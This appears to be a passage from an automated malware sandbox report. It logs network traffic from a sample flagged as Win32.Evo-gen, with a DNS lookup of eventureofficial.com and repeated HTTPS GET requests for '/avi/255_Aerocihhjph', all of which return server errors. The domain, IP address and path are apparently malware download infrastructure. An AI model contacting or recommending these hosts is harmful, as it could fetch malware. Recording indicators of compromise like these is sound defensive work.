                Apr 25, 2024 19:26:03.592026949 CEST4434982068.178.157.109192.168.2.9
                Apr 25, 2024 19:26:03.592272997 CEST4434982068.178.157.109192.168.2.9
                Apr 25, 2024 19:26:03.593621969 CEST49820443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:03.636116982 CEST4434982068.178.157.109192.168.2.9
                Apr 25, 2024 19:26:04.755321026 CEST4434982068.178.157.109192.168.2.9
                Apr 25, 2024 19:26:04.755397081 CEST4434982068.178.157.109192.168.2.9
                Apr 25, 2024 19:26:04.755568027 CEST49820443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:04.755728960 CEST49820443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:04.755728960 CEST49820443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:04.755745888 CEST4434982068.178.157.109192.168.2.9
                Apr 25, 2024 19:26:04.755755901 CEST4434982068.178.157.109192.168.2.9
                Apr 25, 2024 19:26:04.881634951 CEST49821443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:04.881680012 CEST4434982168.178.157.109192.168.2.9
                Apr 25, 2024 19:26:04.881752968 CEST49821443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:04.881867886 CEST49821443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:04.881902933 CEST4434982168.178.157.109192.168.2.9
                Apr 25, 2024 19:26:04.881948948 CEST49821443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:04.886084080 CEST49822443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:04.886117935 CEST4434982268.178.157.109192.168.2.9
                Apr 25, 2024 19:26:04.886193991 CEST49822443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:04.886483908 CEST49822443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:04.886501074 CEST4434982268.178.157.109192.168.2.9
                Apr 25, 2024 19:26:05.563844919 CEST4434982268.178.157.109192.168.2.9
                Apr 25, 2024 19:26:05.564062119 CEST49822443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:05.565191031 CEST49822443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:05.565198898 CEST4434982268.178.157.109192.168.2.9
                Apr 25, 2024 19:26:05.565428972 CEST4434982268.178.157.109192.168.2.9
                Apr 25, 2024 19:26:05.566540003 CEST49822443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:05.608124018 CEST4434982268.178.157.109192.168.2.9
                Apr 25, 2024 19:26:06.700700045 CEST4434982268.178.157.109192.168.2.9
                Apr 25, 2024 19:26:06.700779915 CEST4434982268.178.157.109192.168.2.9
                Apr 25, 2024 19:26:06.700834036 CEST49822443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:06.701086044 CEST49822443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:06.701107025 CEST4434982268.178.157.109192.168.2.9
                Apr 25, 2024 19:26:06.701116085 CEST49822443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:06.701122046 CEST4434982268.178.157.109192.168.2.9
                Apr 25, 2024 19:26:06.834872007 CEST49823443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:06.834917068 CEST4434982368.178.157.109192.168.2.9
                Apr 25, 2024 19:26:06.835043907 CEST49823443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:06.835149050 CEST49823443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:06.835169077 CEST4434982368.178.157.109192.168.2.9
                Apr 25, 2024 19:26:06.835230112 CEST49823443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:06.841757059 CEST49824443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:06.841794968 CEST4434982468.178.157.109192.168.2.9
                Apr 25, 2024 19:26:06.841861010 CEST49824443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:06.842212915 CEST49824443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:06.842221975 CEST4434982468.178.157.109192.168.2.9
                Apr 25, 2024 19:26:07.523174047 CEST4434982468.178.157.109192.168.2.9
                Apr 25, 2024 19:26:07.523272991 CEST49824443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:07.524996042 CEST49824443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:07.525007010 CEST4434982468.178.157.109192.168.2.9
                Apr 25, 2024 19:26:07.525285959 CEST4434982468.178.157.109192.168.2.9
                Apr 25, 2024 19:26:07.526972055 CEST49824443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:07.572127104 CEST4434982468.178.157.109192.168.2.9
                Apr 25, 2024 19:26:08.658783913 CEST4434982468.178.157.109192.168.2.9
                Apr 25, 2024 19:26:08.658881903 CEST4434982468.178.157.109192.168.2.9
                Apr 25, 2024 19:26:08.658941031 CEST49824443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:08.659095049 CEST49824443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:08.659109116 CEST4434982468.178.157.109192.168.2.9
                Apr 25, 2024 19:26:08.659126997 CEST49824443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:08.659132957 CEST4434982468.178.157.109192.168.2.9
                Apr 25, 2024 19:26:08.803029060 CEST49825443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:08.803075075 CEST4434982568.178.157.109192.168.2.9
                Apr 25, 2024 19:26:08.803179979 CEST49825443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:08.803390980 CEST49825443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:08.803419113 CEST4434982568.178.157.109192.168.2.9
                Apr 25, 2024 19:26:08.803478003 CEST49825443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:08.836344957 CEST49826443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:08.836385012 CEST4434982668.178.157.109192.168.2.9
                Apr 25, 2024 19:26:08.836523056 CEST49826443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:08.836880922 CEST49826443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:08.836893082 CEST4434982668.178.157.109192.168.2.9
                Apr 25, 2024 19:26:09.515495062 CEST4434982668.178.157.109192.168.2.9
                Apr 25, 2024 19:26:09.515628099 CEST49826443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:09.516933918 CEST49826443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:09.516947985 CEST4434982668.178.157.109192.168.2.9
                Apr 25, 2024 19:26:09.517307043 CEST4434982668.178.157.109192.168.2.9
                Apr 25, 2024 19:26:09.518440962 CEST49826443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:09.564114094 CEST4434982668.178.157.109192.168.2.9
                Apr 25, 2024 19:26:10.652792931 CEST4434982668.178.157.109192.168.2.9
                Apr 25, 2024 19:26:10.652872086 CEST4434982668.178.157.109192.168.2.9
                Apr 25, 2024 19:26:10.652955055 CEST49826443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:10.653115988 CEST49826443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:10.653141975 CEST4434982668.178.157.109192.168.2.9
                Apr 25, 2024 19:26:10.653156996 CEST49826443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:10.653176069 CEST4434982668.178.157.109192.168.2.9
                Apr 25, 2024 19:26:10.777847052 CEST49827443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:10.777890921 CEST4434982768.178.157.109192.168.2.9
                Apr 25, 2024 19:26:10.777993917 CEST49827443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:10.788506031 CEST49827443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:10.788561106 CEST4434982768.178.157.109192.168.2.9
                Apr 25, 2024 19:26:10.788614035 CEST49827443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:10.793167114 CEST49828443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:10.793226004 CEST4434982868.178.157.109192.168.2.9
                Apr 25, 2024 19:26:10.793303967 CEST49828443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:10.793623924 CEST49828443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:10.793643951 CEST4434982868.178.157.109192.168.2.9
                Apr 25, 2024 19:26:11.478084087 CEST4434982868.178.157.109192.168.2.9
                Apr 25, 2024 19:26:11.478246927 CEST49828443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:11.497550964 CEST49828443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:11.497602940 CEST4434982868.178.157.109192.168.2.9
                Apr 25, 2024 19:26:11.497947931 CEST4434982868.178.157.109192.168.2.9
                Apr 25, 2024 19:26:11.499085903 CEST49828443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:11.544146061 CEST4434982868.178.157.109192.168.2.9
                Apr 25, 2024 19:26:12.625272989 CEST4434982868.178.157.109192.168.2.9
                Apr 25, 2024 19:26:12.625360012 CEST4434982868.178.157.109192.168.2.9
                Apr 25, 2024 19:26:12.625441074 CEST49828443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:12.805550098 CEST49828443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:12.805593967 CEST4434982868.178.157.109192.168.2.9
                Apr 25, 2024 19:26:12.805612087 CEST49828443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:12.805622101 CEST4434982868.178.157.109192.168.2.9
                Apr 25, 2024 19:26:12.930346012 CEST49829443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:12.930394888 CEST4434982968.178.157.109192.168.2.9
                Apr 25, 2024 19:26:12.930490971 CEST49829443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:12.932024002 CEST49829443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:12.932064056 CEST4434982968.178.157.109192.168.2.9
                Apr 25, 2024 19:26:12.932121038 CEST49829443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:12.937952042 CEST49830443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:12.937994957 CEST4434983068.178.157.109192.168.2.9
                Apr 25, 2024 19:26:12.938076019 CEST49830443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:12.938425064 CEST49830443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:12.938443899 CEST4434983068.178.157.109192.168.2.9
                Apr 25, 2024 19:26:13.616931915 CEST4434983068.178.157.109192.168.2.9
                Apr 25, 2024 19:26:13.617053032 CEST49830443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:13.618413925 CEST49830443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:13.618429899 CEST4434983068.178.157.109192.168.2.9
                Apr 25, 2024 19:26:13.618665934 CEST4434983068.178.157.109192.168.2.9
                Apr 25, 2024 19:26:13.619851112 CEST49830443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:13.664119005 CEST4434983068.178.157.109192.168.2.9
                Apr 25, 2024 19:26:14.752041101 CEST4434983068.178.157.109192.168.2.9
                Apr 25, 2024 19:26:14.752168894 CEST4434983068.178.157.109192.168.2.9
                Apr 25, 2024 19:26:14.752233982 CEST49830443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:14.754923105 CEST49830443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:14.754959106 CEST4434983068.178.157.109192.168.2.9
                Apr 25, 2024 19:26:14.754976988 CEST49830443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:14.754987001 CEST4434983068.178.157.109192.168.2.9
                Apr 25, 2024 19:26:14.878629923 CEST49831443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:14.878680944 CEST4434983168.178.157.109192.168.2.9
                Apr 25, 2024 19:26:14.878757954 CEST49831443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:14.949225903 CEST49831443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:14.949315071 CEST4434983168.178.157.109192.168.2.9
                Apr 25, 2024 19:26:14.949399948 CEST49831443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:14.954508066 CEST49832443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:14.954544067 CEST4434983268.178.157.109192.168.2.9
                Apr 25, 2024 19:26:14.954637051 CEST49832443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:14.954996109 CEST49832443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:14.955008030 CEST4434983268.178.157.109192.168.2.9
                Apr 25, 2024 19:26:15.632807016 CEST4434983268.178.157.109192.168.2.9
                Apr 25, 2024 19:26:15.632961035 CEST49832443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:15.634383917 CEST49832443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:15.634394884 CEST4434983268.178.157.109192.168.2.9
                Apr 25, 2024 19:26:15.634730101 CEST4434983268.178.157.109192.168.2.9
                Apr 25, 2024 19:26:15.636333942 CEST49832443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:15.680136919 CEST4434983268.178.157.109192.168.2.9
                Apr 25, 2024 19:26:16.757894993 CEST4434983268.178.157.109192.168.2.9
                Apr 25, 2024 19:26:16.757972956 CEST4434983268.178.157.109192.168.2.9
                Apr 25, 2024 19:26:16.758024931 CEST49832443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:16.758205891 CEST49832443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:16.758219957 CEST4434983268.178.157.109192.168.2.9
                Apr 25, 2024 19:26:16.758232117 CEST49832443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:16.758236885 CEST4434983268.178.157.109192.168.2.9
                Apr 25, 2024 19:26:16.882682085 CEST49833443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:16.882731915 CEST4434983368.178.157.109192.168.2.9
                Apr 25, 2024 19:26:16.882842064 CEST49833443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:16.882977009 CEST49833443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:16.883009911 CEST4434983368.178.157.109192.168.2.9
                Apr 25, 2024 19:26:16.883069038 CEST49833443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:16.887072086 CEST49834443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:16.887108088 CEST4434983468.178.157.109192.168.2.9
                Apr 25, 2024 19:26:16.887192965 CEST49834443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:16.887475014 CEST49834443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:16.887485027 CEST4434983468.178.157.109192.168.2.9
                Apr 25, 2024 19:26:17.569783926 CEST4434983468.178.157.109192.168.2.9
                Apr 25, 2024 19:26:17.569900036 CEST49834443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:17.571293116 CEST49834443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:17.571304083 CEST4434983468.178.157.109192.168.2.9
                Apr 25, 2024 19:26:17.571549892 CEST4434983468.178.157.109192.168.2.9
                Apr 25, 2024 19:26:17.572892904 CEST49834443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:17.620126963 CEST4434983468.178.157.109192.168.2.9
                Apr 25, 2024 19:26:18.707616091 CEST4434983468.178.157.109192.168.2.9
                Apr 25, 2024 19:26:18.707690954 CEST4434983468.178.157.109192.168.2.9
                Apr 25, 2024 19:26:18.707813978 CEST49834443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:18.712081909 CEST49834443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:18.712105036 CEST4434983468.178.157.109192.168.2.9
                Apr 25, 2024 19:26:18.712146044 CEST49834443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:18.712155104 CEST4434983468.178.157.109192.168.2.9
                Apr 25, 2024 19:26:18.841907978 CEST49835443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:18.841933012 CEST4434983568.178.157.109192.168.2.9
                Apr 25, 2024 19:26:18.842051029 CEST49835443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:18.842310905 CEST49835443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:18.842968941 CEST4434983568.178.157.109192.168.2.9
                Apr 25, 2024 19:26:18.843097925 CEST49835443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:18.853010893 CEST49836443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:18.853056908 CEST4434983668.178.157.109192.168.2.9
                Apr 25, 2024 19:26:18.853255987 CEST49836443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:18.853607893 CEST49836443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:18.853626966 CEST4434983668.178.157.109192.168.2.9
                Apr 25, 2024 19:26:19.537008047 CEST4434983668.178.157.109192.168.2.9
                Apr 25, 2024 19:26:19.537116051 CEST49836443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:19.538392067 CEST49836443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:19.538408041 CEST4434983668.178.157.109192.168.2.9
                Apr 25, 2024 19:26:19.539000034 CEST4434983668.178.157.109192.168.2.9
                Apr 25, 2024 19:26:19.540122986 CEST49836443192.168.2.968.178.157.109
                Apr 25, 2024 19:26:19.584121943 CEST4434983668.178.157.109192.168.2.9
                Apr 25, 2024 19:26:20.680340052 CEST4434983668.178.157.109192.168.2.9
                Apr 25, 2024 19:26:20.680429935 CEST4434983668.178.157.109192.168.2.9
                Apr 25, 2024 19:26:20.680533886 CEST49836443192.168.2.968.178.157.109
                TimestampSource PortDest PortSource IPDest IP
                Apr 25, 2024 19:24:16.301592112 CEST6345253192.168.2.91.1.1.1
                Apr 25, 2024 19:24:16.447386026 CEST53634521.1.1.1192.168.2.9
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Apr 25, 2024 19:24:16.301592112 CEST192.168.2.91.1.1.10xb71dStandard query (0)eventureofficial.comA (IP address)IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Apr 25, 2024 19:24:16.447386026 CEST1.1.1.1192.168.2.90xb71dNo error (0)eventureofficial.com68.178.157.109A (IP address)IN (0x0001)false
                • eventureofficial.com
                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.94970668.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:24:17 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:24:18 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:24:17 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.94970868.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:24:19 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:24:20 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:24:19 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                2192.168.2.94971068.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:24:21 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:24:22 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:24:21 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                3192.168.2.94971268.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:24:23 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:24:24 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:24:23 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                4192.168.2.94971468.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:24:25 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:24:26 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:24:25 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                5192.168.2.94971668.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:24:27 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:24:28 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:24:27 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                6192.168.2.94971868.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:24:29 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:24:30 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:24:29 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                7192.168.2.94972068.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:24:32 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:24:33 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:24:33 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                8192.168.2.94972768.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:24:34 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:24:35 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:24:35 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                9192.168.2.94973268.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:24:36 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:24:37 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:24:37 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                10192.168.2.94973468.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:24:38 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:24:39 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:24:39 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                11192.168.2.94973668.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:24:40 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:24:41 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:24:41 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                12192.168.2.94973868.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:24:42 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:24:43 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:24:43 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                13192.168.2.94974068.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:24:44 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:24:45 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:24:44 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                14192.168.2.94974268.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:24:46 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:24:47 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:24:46 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
